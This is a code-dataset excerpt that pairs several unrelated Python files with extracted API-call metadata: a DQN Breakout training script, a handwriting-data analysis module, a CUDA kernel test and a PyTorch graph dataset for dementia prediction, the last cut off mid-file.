cv2\n'), ((2933, 2956), 'artsci2019.lib.sound.SoundPlayer', 'SoundPlayer', (['"""bing.wav"""'], {}), "('bing.wav')\n", (2944, 2956), False, 'from artsci2019.lib.sound import SoundPlayer\n'), ((3014, 3069), 'cv2.namedWindow', 'cv2.namedWindow', (['self.preview_window', 'cv2.WINDOW_NORMAL'], {}), '(self.preview_window, cv2.WINDOW_NORMAL)\n', (3029, 3069), False, 'import cv2\n'), ((3078, 3134), 'cv2.namedWindow', 'cv2.namedWindow', (['self.genimage_window', 'cv2.WINDOW_NORMAL'], {}), '(self.genimage_window, cv2.WINDOW_NORMAL)\n', (3093, 3134), False, 'import cv2\n'), ((3367, 3403), 'cv2.VideoCapture', 'cv2.VideoCapture', (['self.camera_number'], {}), '(self.camera_number)\n', (3383, 3403), False, 'import cv2\n'), ((4039, 4077), 'cv2.destroyWindow', 'cv2.destroyWindow', (['self.preview_window'], {}), '(self.preview_window)\n', (4056, 4077), False, 'import cv2\n'), ((4086, 4125), 'cv2.destroyWindow', 
'cv2.destroyWindow', (['self.genimage_window'], {}), '(self.genimage_window)\n', (4103, 4125), False, 'import cv2\n'), ((4235, 4258), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4256, 4258), False, 'import datetime\n'), ((5103, 5141), 'artsci2019.lib.util.scale_frame', 'scale_frame', (['frame', 'self.debug_scaling'], {}), '(frame, self.debug_scaling)\n', (5114, 5141), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((5231, 5254), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (5252, 5254), False, 'import datetime\n'), ((6029, 6073), 'cv2.imshow', 'cv2.imshow', (['self.preview_window', 'new_preview'], {}), '(self.preview_window, new_preview)\n', (6039, 6073), False, 'import cv2\n'), ((6082, 6128), 'cv2.imshow', 'cv2.imshow', (['self.genimage_window', 'new_genimage'], {}), '(self.genimage_window, new_genimage)\n', (6092, 6128), False, 'import cv2\n'), ((6137, 6152), 'cv2.waitKey', 'cv2.waitKey', (['(50)'], {}), '(50)\n', (6148, 6152), False, 'import cv2\n'), ((2814, 2837), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2835, 2837), False, 'import datetime\n'), ((2840, 2870), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(10)'}), '(seconds=10)\n', (2858, 2870), False, 'import datetime\n'), ((3224, 3320), 'cv2.setWindowProperty', 'cv2.setWindowProperty', (['self.genimage_window', 'cv2.WND_PROP_FULLSCREEN', 'cv2.WINDOW_FULLSCREEN'], {}), '(self.genimage_window, cv2.WND_PROP_FULLSCREEN, cv2.\n WINDOW_FULLSCREEN)\n', (3245, 3320), False, 'import cv2\n'), ((3731, 3769), 'artsci2019.lib.util.scale_frame', 'scale_frame', (['frame', 'self.debug_scaling'], {}), '(frame, self.debug_scaling)\n', (3742, 3769), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((3782, 3829), 'cv2.imshow', 'cv2.imshow', (['self.genimage_window', 'self.genimage'], {}), '(self.genimage_window, self.genimage)\n', (3792, 3829), False, 'import cv2\n'), ((3888, 3912), 'artsci2019.lib.frame_checker.FrameChecker', 'FrameChecker', (['(1080)', '(1920)'], {}), '(1080, 1920)\n', (3900, 3912), False, 'from artsci2019.lib.frame_checker import FrameChecker\n'), ((3960, 3984), 'artsci2019.lib.frame_checker.FrameChecker', 'FrameChecker', (['(1920)', '(1080)'], {}), '(1920, 1080)\n', (3972, 3984), False, 'from artsci2019.lib.frame_checker import FrameChecker\n'), ((4810, 4857), 'artsci2019.lib.util.scale_frame', 'scale_frame', (['portrait_frame', 'self.debug_scaling'], {}), '(portrait_frame, self.debug_scaling)\n', (4821, 4857), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((4900, 4947), 'cv2.imshow', 'cv2.imshow', (['self.genimage_window', 'self.genimage'], {}), '(self.genimage_window, self.genimage)\n', (4910, 4947), False, 'import cv2\n'), ((5581, 5639), 'cv2.addWeighted', 'cv2.addWeighted', (['self.genimage', '(1 - score)', 'frame', 'score', '(0)'], {}), '(self.genimage, 1 - score, frame, score, 0)\n', (5596, 5639), False, 'import cv2\n'), ((6826, 6841), 'cv2.waitKey', 'cv2.waitKey', (['(20)'], {}), '(20)\n', (6837, 6841), False, 'import cv2\n'), ((1598, 1619), 'numpy.reshape', 'np.reshape', (['t', '(3, 2)'], {}), '(t, (3, 2))\n', (1608, 1619), True, 'import numpy as np\n'), ((4998, 5028), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(10)'}), '(seconds=10)\n', (5016, 5028), False, 'import datetime\n'), ((6558, 6595), 'artsci2019.lib.face_recog.get_faces', 'get_faces', (['frame', 'self.scaling_factor'], {}), '(frame, 
self.scaling_factor)\n', (6567, 6595), False, 'from artsci2019.lib.face_recog import get_faces\n')]
|
import gym
from dqn_tf import DeepQNetwork, Agent
import numpy as np
from gym import wrappers
def preprocess(observation):
    # crop the score bar and grayscale the RGB frame: (210, 160, 3) -> (180, 160, 1)
    return np.mean(observation[30:, :], axis=2).reshape(180, 160, 1)
def stack_frames(stacked_frames, frame, buffer_size):
if stacked_frames is None:
        stacked_frames = np.zeros((buffer_size, *frame.shape))
        for idx, _ in enumerate(stacked_frames):
            stacked_frames[idx, :] = frame
else:
stacked_frames[0:buffer_size-1, :] = stacked_frames[1:, :]
        stacked_frames[buffer_size-1, :] = frame
    stacked_frames = stacked_frames.reshape(1, *frame.shape[0:2], buffer_size)
return stacked_frames
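# Shape sketch (assuming preprocess() yields (180, 160, 1) frames): the buffer
# is held as (buffer_size, 180, 160, 1) while it is being filled, and the final
# reshape hands back a single observation of shape (1, 180, 160, buffer_size)
# for the network.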
if __name__ == "__main__":
env = gym.make("Breakout-v0")
load_checkpoint = False
agent = Agent(gamma=0.99, epsilon=1.0, alpha=0.00025, input_dims=(180, 160, 4),
n_actions=3, mem_size=3000, batch_size=32)
if load_checkpoint:
agent.load_models()
scores = []
numGames = 200
    stack_size = 4  # one stacked channel per frame, matching input_dims=(180, 160, 4)
score = 0
while agent.mem_cntr < 3000:
done = False
observation = env.reset()
observation = preprocess(observation)
stacked_frames = None
observation = stack_frames(stacked_frames, observation, stack_size)
while not done:
action = np.random.choice([0, 1, 2])
action += 1
observation_, reward, done, info = env.step(action)
observation_ = stack_frames(stacked_frames, preprocess(observation_),
stack_size)
action -= 1
agent.store_transition(observation, action,
reward, observation_, int(done))
observation = observation_
print("Done with random gameplay, game on")
for i in range(numGames):
done = False
if i % 10 == 0 and i > 0:
            avg_score = np.mean(scores[max(0, i-10):(i+1)])
print('episode', i, 'score', score, 'average_score %.3f' % avg_score,
'epsilon %.3f' % agent.epsilon)
agent.save_models()
else:
print('episode: ', i, 'score ', score)
observation = env.reset()
observation = preprocess(observation)
stacked_frames = None
observation = stack_frames(stacked_frames, observation, stack_size)
while not done:
action = agent.choose_action(observation)
action += 1
observation_, reward, done, info = env.step(action)
observation_ = stack_frames(stacked_frames, preprocess(observation_),
stack_size)
action -= 1
agent.store_transition(observation, action,
reward, observation_, int(done))
observation = observation_
agent.learn()
score += reward
scores.append(score)
|
[
"numpy.mean",
"numpy.random.choice",
"numpy.zeros",
"dqn_tf.Agent",
"gym.make"
] |
[((717, 740), 'gym.make', 'gym.make', (['"""Breakout-v0"""'], {}), "('Breakout-v0')\n", (725, 740), False, 'import gym\n'), ((781, 899), 'dqn_tf.Agent', 'Agent', ([], {'gamma': '(0.99)', 'epsilon': '(1.0)', 'alpha': '(0.00025)', 'input_dims': '(180, 160, 4)', 'n_actions': '(3)', 'mem_size': '(3000)', 'batch_size': '(32)'}), '(gamma=0.99, epsilon=1.0, alpha=0.00025, input_dims=(180, 160, 4),\n n_actions=3, mem_size=3000, batch_size=32)\n', (786, 899), False, 'from dqn_tf import DeepQNetwork, Agent\n'), ((306, 345), 'numpy.zeros', 'np.zeros', (['(buffer_size, *frame.reshape)'], {}), '((buffer_size, *frame.reshape))\n', (314, 345), True, 'import numpy as np\n'), ((136, 172), 'numpy.mean', 'np.mean', (['observation[30:, :]'], {'axis': '(2)'}), '(observation[30:, :], axis=2)\n', (143, 172), True, 'import numpy as np\n'), ((1322, 1349), 'numpy.random.choice', 'np.random.choice', (['[0, 1, 2]'], {}), '([0, 1, 2])\n', (1338, 1349), True, 'import numpy as np\n')]
|
"""Data analyzation metrics
Each algorithm works on a set of handwritings. They have to be applied like
this:
>>> import hwrt.data_analyzation_metrics
>>> from hwrt.handwritten_data import HandwrittenData
>>> data_json = '[[{"time": 123, "x": 45, "y": 67}]]'
>>> a = [{'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=2953, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "2953L"},
... {'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=4037, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "4037L"},
... {'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=4056, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "4056L"}]
>>> creator_metric = Creator('creator.csv')
>>> creator_metric(a)
100%
"""
# Core Library modules
import logging
import math
import os
import sys
import time
from collections import defaultdict
# Third party modules
import numpy
# Local modules
# HandwrittenData and preprocessing are needed because of pickle
from . import handwritten_data # pylint: disable=W0611
from . import preprocessing # pylint: disable=W0611
from . import utils
logger = logging.getLogger(__name__)
sys.modules["hwrt.HandwrittenData"] = handwritten_data
def get_metrics(metrics_description):
"""Get metrics from a list of dictionaries. """
return utils.get_objectlist(
metrics_description,
config_key="data_analyzation_plugins",
module=sys.modules[__name__],
)
# Helper functions that are useful for some metrics
def prepare_file(filename):
"""Truncate the file and return the filename."""
directory = os.path.join(utils.get_project_root(), "analyzation/")
if not os.path.exists(directory):
os.makedirs(directory)
workfilename = os.path.join(directory, filename)
with open(workfilename, "w") as fp:
pass # Truncate the file
return workfilename
def sort_by_formula_id(raw_datasets):
"""
    Group the recordings by formula id, where the formula id is the id of the
    accepted formula.
Parameters
----------
raw_datasets : list of dictionaries
A list of raw datasets.
Examples
--------
The parameter `raw_datasets` has to be of the format
>>> from hwrt.handwritten_data import HandwrittenData
>>> data = '[[{"time": 123, "x": 45, "y": 67}]]'
>>> rd = [{'is_in_testset': 0,
... 'formula_id': 31,
... 'handwriting': HandwrittenData(raw_data_id=2953, raw_data_json=data),
... 'formula_in_latex': 'A',
... 'id': 2953},
... {'is_in_testset': 0,
... 'formula_id': 31,
... 'handwriting': HandwrittenData(raw_data_id=4037, raw_data_json=data),
... 'formula_in_latex': 'A',
... 'id': 4037},
... {'is_in_testset': 0,
... 'formula_id': 31,
... 'handwriting': HandwrittenData(raw_data_id=4056, raw_data_json=data),
... 'formula_in_latex': 'A',
... 'id': 4056}]
>>> _ = sort_by_formula_id(rd)
"""
by_formula_id = defaultdict(list)
for el in raw_datasets:
by_formula_id[el["handwriting"].formula_id].append(el["handwriting"])
return by_formula_id
# Only data analyzation calculation classes follow
# Every class must have a __str__, __repr__ and __call__ function where
# __call__ must take exactly one argument of type list of dictionaries
# Every class must have a constructor which takes the filename as a parameter.
# This filename has to be used to write the evaluation results
# (preferably in CSV format) to this file.
# prepare_file should be applied to every file in the constructor
class Creator:
"""Analyze who created most of the data."""
def __init__(self, filename="creator.csv"):
self.filename = prepare_file(filename)
def __repr__(self):
return "AnalyzeCreator(%s)" % self.filename
def __str__(self):
return "AnalyzeCreator(%s)" % self.filename
def __call__(self, raw_datasets):
with open(self.filename, "a") as write_file:
write_file.write("creatorid,nr of recordings\n") # heading
print_data = defaultdict(int)
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
print_data[raw_dataset["handwriting"].user_id] += 1
print("100%")
# Sort the data by highest value, descending
print_data = sorted(print_data.items(), key=lambda n: n[1], reverse=True)
# Write data to file
write_file.write(f"total,{sum(value for _, value in print_data)}\n")
for userid, value in print_data:
write_file.write(f"{userid},{value}\n")
class InstrokeSpeed:
"""Analyze how fast the points were in pixel/ms."""
def __init__(self, filename="instroke_speed.csv"):
self.filename = prepare_file(filename)
def __repr__(self):
return "InstrokeSpeed(%s)" % self.filename
def __str__(self):
return "InstrokeSpeed(%s)" % self.filename
def __call__(self, raw_datasets):
with open(self.filename, "a") as write_file:
write_file.write("speed\n") # heading
print_data = []
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
pointlist = raw_dataset["handwriting"].get_sorted_pointlist()
for stroke in pointlist:
for last_point, point in zip(stroke, stroke[1:]):
space_dist = math.hypot(
last_point["x"] - point["x"], last_point["y"] - point["y"]
)
time_delta = point["time"] - last_point["time"]
if time_delta == 0:
continue
print_data.append(space_dist / time_delta)
print("100%")
# Sort the data by highest value, descending
print_data = sorted(print_data, reverse=True)
# Write data to file
for value in print_data:
write_file.write("%0.8f\n" % (value))
logger.info("instroke speed mean: %0.8f", numpy.mean(print_data))
logger.info("instroke speed std: %0.8f", numpy.std(print_data))
class InterStrokeDistance:
"""Analyze how much distance in px is between strokes."""
def __init__(self, filename="dist_between_strokes.csv"):
self.filename = prepare_file(filename)
def __repr__(self):
return "InterStrokeDistance(%s)" % self.filename
def __str__(self):
return "InterStrokeDistance(%s)" % self.filename
def __call__(self, raw_datasets):
with open(self.filename, "a") as write_file:
write_file.write("speed\n") # heading
print_data = []
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
pointlist = raw_dataset["handwriting"].get_sorted_pointlist()
for last_stroke, stroke in zip(pointlist, pointlist[1:]):
point1 = last_stroke[-1]
point2 = stroke[0]
space_dist = math.hypot(
point1["x"] - point2["x"], point1["y"] - point2["y"]
)
print_data.append(space_dist)
print("100%")
# Sort the data by highest value, descending
print_data = sorted(print_data, reverse=True)
# Write data to file
for value in print_data:
write_file.write("%0.8f\n" % (value))
logger.info("dist_between_strokes mean:\t%0.8fpx", numpy.mean(print_data))
logger.info("dist_between_strokes std: \t%0.8fpx", numpy.std(print_data))
class TimeBetweenPointsAndStrokes:
"""For each recording: Store the average time between controll points of
one stroke / controll points of two different strokes.
"""
def __init__(
self,
filename="average_time_between_points.txt",
filename_strokes="average_time_between_strokes.txt",
):
self.filename_points = prepare_file(filename)
self.filename_strokes = prepare_file(filename_strokes)
def __repr__(self):
return "TimeBetweenPointsAndStrokes({points}, {strokes})".format(
points=self.filename_points,
strokes=self.filename_strokes,
)
__str__ = __repr__
def __call__(self, raw_datasets):
average_between_points = open(self.filename_points, "a") # noqa
average_between_strokes = open(self.filename_strokes, "a") # noqa
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
# Do the work
times_between_points, times_between_strokes = [], []
last_stroke_end = None
for stroke in raw_dataset["handwriting"].get_sorted_pointlist():
if last_stroke_end is not None:
times_between_strokes.append(stroke[-1]["time"] - last_stroke_end)
last_stroke_end = stroke[-1]["time"]
for point1, point2 in zip(stroke, stroke[1:]):
delta = point2["time"] - point1["time"]
times_between_points.append(delta)
# The recording might only have one point
if len(times_between_points) > 0:
tmp = times_between_points
average_between_points.write("%0.2f\n" % numpy.average(tmp))
# The recording might only have one stroke
if len(times_between_strokes) > 0:
tmp = times_between_strokes
average_between_strokes.write("%0.2f\n" % numpy.average(tmp))
print("100%")
average_between_points.close()
average_between_strokes.close()
class AnalyzeErrors:
"""Analyze the number of errors in the dataset."""
def __init__(self, filename="errors.txt", time_max_threshold=30 * 1000):
self.filename = prepare_file(filename)
self.time_max_threshold = time_max_threshold # in ms
self.dot_symbols = [
"i",
"j",
r"\cdot",
r"\div",
"\\because",
"\\therefore",
] # TODO: Use the tags!
def __repr__(self):
return "AnalyzeErrors"
def __str__(self):
return "AnalyzeErrors"
def _write_data(
self,
symbols,
err_recs,
nr_recordings,
total_error_count,
percentages,
time_max_list,
):
"""Write all obtained data to a file.
Parameters
----------
symbols : list of tuples (String, non-negative int)
List of all symbols with the count of recordings
err_recs : dictionary
count of recordings by error type
nr_recordings : non-negative int
number of recordings
total_error_count : dictionary
Count of all error that have happened by type
percentages : list
List of all recordings where removing the dots changed the size of
the bounding box.
time_max_list : list
List of all recordings where the recording time is above a
threshold.
"""
write_file = open(self.filename, "a") # noqa
s = ""
for symbol, count in sorted(symbols.items(), key=lambda n: n[0]):
if symbol in ["a", "0", "A"]:
s += "\n%s (%i), " % (symbol, count)
elif symbol in ["z", "9", "Z"]:
s += "%s (%i) \n" % (symbol, count)
else:
s += "%s (%i), " % (symbol, count)
print("## Data", file=write_file)
print("Symbols: %i" % len(symbols), file=write_file)
print("Recordings: %i" % sum(symbols.values()), file=write_file)
print("```", file=write_file)
print(s[:-1], file=write_file)
print("```", file=write_file)
# Show errors
print(
"Recordings with wild points: %i (%0.2f%%)"
% (
err_recs["wild_points"],
float(err_recs["wild_points"]) / nr_recordings * 100,
),
file=write_file,
)
print("wild points: %i" % total_error_count["wild_points"], file=write_file)
print(
"Recordings with missing stroke: %i (%0.2f%%)"
% (
err_recs["missing_stroke"],
float(err_recs["missing_stroke"]) / nr_recordings * 100,
),
file=write_file,
)
print(
"Recordings with errors: %i (%0.2f%%)"
% (err_recs["total"], float(err_recs["total"]) / nr_recordings * 100),
file=write_file,
)
print(
"Recordings with dots: %i (%0.2f%%)"
% (
err_recs["single_dots"],
float(err_recs["single_dots"]) / nr_recordings * 100,
),
file=write_file,
)
print("dots: %i" % total_error_count["single_dots"], file=write_file)
print(
"size changing removal: %i (%0.2f%%)"
% (len(percentages), float(len(percentages)) / nr_recordings * 100),
file=write_file,
)
print(
"%i recordings took more than %i ms. That were: "
% (len(time_max_list), self.time_max_threshold),
file=write_file,
)
for recording in time_max_list:
print(
"* %ims: %s: %s"
% (
recording.get_time(),
utils.get_readable_time(recording.get_time()),
recording,
),
file=write_file,
)
write_file.close()
def __call__(self, raw_datasets):
# Initialize variables
symbols = defaultdict(int)
        # Count erroneous recordings
err_recs = {
"wild_points": 0,
"missing_stroke": 0,
"single_dots": 0, # except symbols_with_dots
"total": 0,
}
# Count errors (one type of error might occur multiple times in
# a single recording)
total_error_count = {"wild_points": 0, "single_dots": 0}
percentages = []
# List with recordings that are over the time maximum
time_max_list = []
for raw_dataset in raw_datasets:
recording = raw_dataset["handwriting"]
symbols[recording.formula_in_latex] += 1
if recording.get_time() > self.time_max_threshold:
time_max_list.append(recording)
if recording.wild_point_count > 0:
err_recs["wild_points"] += 1
total_error_count["wild_points"] += recording.wild_point_count
err_recs["missing_stroke"] += recording.missing_stroke
if recording.wild_point_count > 0 or recording.missing_stroke:
err_recs["total"] += 1
if (
recording.count_single_dots() > 0
and raw_dataset["formula_in_latex"] not in self.dot_symbols
and "dots" not in raw_dataset["formula_in_latex"]
):
err_recs["single_dots"] += 1
old_area = recording.get_area()
tmp = [preprocessing.RemoveDots()]
recording.preprocessing(tmp)
new_area = recording.get_area()
percentage = float(new_area) / float(old_area)
if percentage < 1.0:
percentages.append(percentage)
total_error_count["single_dots"] += recording.count_single_dots()
time_max_list = sorted(time_max_list, key=lambda n: n.get_time(), reverse=True)
self._write_data(
symbols,
err_recs,
len(raw_datasets),
total_error_count,
percentages,
time_max_list,
)
|
[
"logging.getLogger",
"os.path.exists",
"numpy.mean",
"os.makedirs",
"numpy.average",
"os.path.join",
"collections.defaultdict",
"numpy.std",
"math.hypot",
"time.time"
] |
[((1294, 1321), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1311, 1321), False, 'import logging\n'), ((1918, 1951), 'os.path.join', 'os.path.join', (['directory', 'filename'], {}), '(directory, filename)\n', (1930, 1951), False, 'import os\n'), ((3211, 3228), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3222, 3228), False, 'from collections import defaultdict\n'), ((1841, 1866), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (1855, 1866), False, 'import os\n'), ((1876, 1898), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (1887, 1898), False, 'import os\n'), ((9196, 9207), 'time.time', 'time.time', ([], {}), '()\n', (9205, 9207), False, 'import time\n'), ((14570, 14586), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (14581, 14586), False, 'from collections import defaultdict\n'), ((4311, 4327), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4322, 4327), False, 'from collections import defaultdict\n'), ((4353, 4364), 'time.time', 'time.time', ([], {}), '()\n', (4362, 4364), False, 'import time\n'), ((5524, 5535), 'time.time', 'time.time', ([], {}), '()\n', (5533, 5535), False, 'import time\n'), ((7263, 7274), 'time.time', 'time.time', ([], {}), '()\n', (7272, 7274), False, 'import time\n'), ((6603, 6625), 'numpy.mean', 'numpy.mean', (['print_data'], {}), '(print_data)\n', (6613, 6625), False, 'import numpy\n'), ((6680, 6701), 'numpy.std', 'numpy.std', (['print_data'], {}), '(print_data)\n', (6689, 6701), False, 'import numpy\n'), ((8210, 8232), 'numpy.mean', 'numpy.mean', (['print_data'], {}), '(print_data)\n', (8220, 8232), False, 'import numpy\n'), ((8297, 8318), 'numpy.std', 'numpy.std', (['print_data'], {}), '(print_data)\n', (8306, 8318), False, 'import numpy\n'), ((7720, 7784), 'math.hypot', 'math.hypot', (["(point1['x'] - point2['x'])", "(point1['y'] - point2['y'])"], {}), "(point1['x'] - point2['x'], point1['y'] - point2['y'])\n", (7730, 7784), False, 'import math\n'), ((5938, 6008), 'math.hypot', 'math.hypot', (["(last_point['x'] - point['x'])", "(last_point['y'] - point['y'])"], {}), "(last_point['x'] - point['x'], last_point['y'] - point['y'])\n", (5948, 6008), False, 'import math\n'), ((10141, 10159), 'numpy.average', 'numpy.average', (['tmp'], {}), '(tmp)\n', (10154, 10159), False, 'import numpy\n'), ((10365, 10383), 'numpy.average', 'numpy.average', (['tmp'], {}), '(tmp)\n', (10378, 10383), False, 'import numpy\n')]
|
from __future__ import print_function
import numpy as np
from kernel_tuner import run_kernel
from .context import skip_if_no_cuda_device, create_plot
from km3net.util import get_kernel_path, generate_correlations_table
def test_degrees_kernel():
skip_if_no_cuda_device()
def in_degrees(correlations):
degrees = np.zeros(correlations.shape[1])
for i in range(correlations.shape[1]):
in_degree = 0
for j in range(correlations.shape[0]):
col = i-j-1
if col>=0:
in_degree += correlations[j, col]
degrees[i] = in_degree
return degrees
with open(get_kernel_path()+'degrees.cu', 'r') as f:
kernel_string = f.read()
N = np.int32(400)
sliding_window_width = np.int32(150)
problem_size = (N, 1)
#generate input data with an expected density of correlated hits
correlations = generate_correlations_table(N, sliding_window_width, cutoff=2.87)
#compute reference answer
in_degree = in_degrees(correlations)
out_degree = np.sum(correlations, axis=0).astype(np.int32)
reference = (in_degree+out_degree)
#call the CUDA kernel
args = [out_degree, correlations, N]
params = { "block_size_x": 256, 'window_width': sliding_window_width }
answer = run_kernel("degrees_dense", kernel_string, problem_size, args, params)
print("answer", answer[0])
print("reference", reference)
#verify
test_result = np.sum(answer[0] - reference) == 0
    if not test_result:
print("test degrees_dense FAILED, attempting to create a plot for visual comparison")
create_plot(reference.reshape(20,20), answer[0].reshape(20,20))
assert test_result
|
[
"km3net.util.generate_correlations_table",
"km3net.util.get_kernel_path",
"numpy.int32",
"numpy.sum",
"numpy.zeros",
"kernel_tuner.run_kernel"
] |
[((754, 767), 'numpy.int32', 'np.int32', (['(400)'], {}), '(400)\n', (762, 767), True, 'import numpy as np\n'), ((795, 808), 'numpy.int32', 'np.int32', (['(150)'], {}), '(150)\n', (803, 808), True, 'import numpy as np\n'), ((924, 989), 'km3net.util.generate_correlations_table', 'generate_correlations_table', (['N', 'sliding_window_width'], {'cutoff': '(2.87)'}), '(N, sliding_window_width, cutoff=2.87)\n', (951, 989), False, 'from km3net.util import get_kernel_path, generate_correlations_table\n'), ((1320, 1390), 'kernel_tuner.run_kernel', 'run_kernel', (['"""degrees_dense"""', 'kernel_string', 'problem_size', 'args', 'params'], {}), "('degrees_dense', kernel_string, problem_size, args, params)\n", (1330, 1390), False, 'from kernel_tuner import run_kernel\n'), ((331, 362), 'numpy.zeros', 'np.zeros', (['correlations.shape[1]'], {}), '(correlations.shape[1])\n', (339, 362), True, 'import numpy as np\n'), ((1488, 1517), 'numpy.sum', 'np.sum', (['(answer[0] - reference)'], {}), '(answer[0] - reference)\n', (1494, 1517), True, 'import numpy as np\n'), ((1079, 1107), 'numpy.sum', 'np.sum', (['correlations'], {'axis': '(0)'}), '(correlations, axis=0)\n', (1085, 1107), True, 'import numpy as np\n'), ((669, 686), 'km3net.util.get_kernel_path', 'get_kernel_path', ([], {}), '()\n', (684, 686), False, 'from km3net.util import get_kernel_path, generate_correlations_table\n')]
|
import numpy as np
import torch
import torch.nn.functional as F
from scipy.sparse import coo_matrix
from sklearn.preprocessing import StandardScaler
from torch.utils.data import Dataset
from torch_geometric.data import InMemoryDataset, Data, Batch
from tqdm.auto import tqdm
from utils.data_utils import window_data_sorted, add_age_gender
class GraphDataset(InMemoryDataset):
"""
Dataset to use for graph neural networks.
"""
def __init__(self, root='/data/home/efridgeirsson/projects/dementia/data/sequence_dementia'):
super(GraphDataset, self).__init__(root)
self.data, self.slices = torch.load(self.processed_paths[0])
self.labels = self.data.y
@property
def num_features(self):
return len(self.data.x.unique())
@property
def raw_file_names(self):
return ['python_data']
@property
def processed_file_names(self):
return ['dementia.dataset']
def download(self):
pass
def process(self):
data = torch.load(self.raw_paths[0])
old_covariate_ids = data['map'].oldCovariateId
covariate_ref = data['covariateRef']
feature_names = covariate_ref[covariate_ref.covariateId.isin(old_covariate_ids)].covariateName.values
window_lengths = (30, 180, 365)
feature_matrix_counts, windowed_feature_names = window_data_sorted(
window_lengths=list(window_lengths),
feature_matrix=data['data'].coalesce(),
all_feature_names=feature_names)
feature_matrix_counts = feature_matrix_counts.T
feature_matrix_counts.data = np.clip(feature_matrix_counts.data, 0, 1) # counts to binary
feature_matrix_counts, windowed_feature_names = add_age_gender(feature_matrix_counts,
data['nonTemporalData'],
windowed_feature_names,
age_normalized=False)
train_index = data['population'][data['population']['index'] >= 0].index.values
test_index = data['population'][data['population']['index'] < 0.0].index.values
encounter_data = feature_matrix_counts[:, :-4]
demographic_data = feature_matrix_counts[:, -4:].toarray()
scaler = StandardScaler()
demographic_data[train_index, :-1] = scaler.fit_transform(demographic_data[train_index, :-1])
demographic_data[test_index, :-1] = scaler.transform(demographic_data[test_index, :-1])
outcomes = torch.as_tensor(data['population'].outcomeCount.values, dtype=torch.float32)
demographic_data = torch.as_tensor(demographic_data, dtype=torch.float32)
patients = [p for p in range(encounter_data.shape[0])]
data_list = self.process_patient(patients, demographic_data, encounter_data, outcomes)
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
@staticmethod
def process_patient(patient_idxs, demographic_data=None, encounter_data=None, outcomes=None):
data = []
for patient_idx in tqdm(patient_idxs):
patient_data = encounter_data[patient_idx, :].toarray()
source_nodes = torch.as_tensor(patient_data.nonzero()[1], dtype=torch.long)
num_nodes = len(source_nodes)
source_nodes = source_nodes[None, :]
normalized_source_nodes = torch.as_tensor((range(len(source_nodes.unique()))))
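            # Connect every active feature node of this patient to every other
            # one (fully-connected graph, self-loops included), using the
            # re-indexed node ids 0..num_nodes-1.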
edge_index = torch.cat((normalized_source_nodes.repeat(1, num_nodes),
normalized_source_nodes.repeat(num_nodes, 1).transpose(0, 1).contiguous().view(
(1, num_nodes ** 2))), dim=0)
# add extra node for classification
output_nodes = torch.cat((source_nodes[0, :], torch.as_tensor([patient_data.shape[1]])))
output_nodes = output_nodes[None, :]
normalized_output_nodes = torch.as_tensor((range(len(output_nodes.unique()))))
output_edge_index = torch.cat((normalized_output_nodes.repeat(1, num_nodes + 1),
normalized_output_nodes.repeat(num_nodes + 1, 1).transpose(0,
1).contiguous().view(
(1, (num_nodes + 1) ** 2))), dim=0)
dem_data = demographic_data[patient_idx, :]
y = outcomes[patient_idx]
data.append(Data(x=output_nodes.transpose(0, 1), edge_index=edge_index.long(),
output_edge_index=output_edge_index.long(), y=y,
demographic=dem_data[None, :]))
return data
def graph_collate(batch):
"""
Collate function to use with graph datasets.
Parameters
----------
    batch : list of torch_geometric `Data` objects to collate.
    Returns
    -------
    The merged `Batch` object together with its labels (`batch.y`).
    """
elem = batch[0]
if isinstance(elem, Data):
batch = Batch.from_data_list(batch)
return batch, batch.y
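# Illustrative sketch (an assumption, not part of the original project): how
# graph_collate would typically be plugged into a PyTorch DataLoader.
def _example_graph_loader(dataset, batch_size=32):
    from torch.utils.data import DataLoader
    # collate_fn=graph_collate merges the Data objects of a batch into one Batch
    return DataLoader(dataset, batch_size=batch_size, shuffle=True, collate_fn=graph_collate)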
class SARDData(Dataset):
"""
Dataset class used for the original SARD implementation.
"""
def __init__(self, indices, non_temporal, train_indices, outcomes, linear_predictions=None,
distill=True):
"""
Parameters
----------
indices : dict with train, val and test indices
outcomes : outcome labels
linear_predictions : predictions from previous model to distill
distill : if run for distillation or not, if distillation then get_item returns also predictions
of already fit model
"""
self.distill = distill
self.outcomes = outcomes
self.linear_predictions = linear_predictions
self.indices = indices
        # convert R's 1-based row ids to Python's 0-based indexing
non_temporal.rowIdPython = non_temporal.rowIdPython - 1
# extract age and other covariates
age_id = 1002
age_df = non_temporal[non_temporal.covariateId == age_id]
age_df = age_df.sort_values(by='rowIdPython')
age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
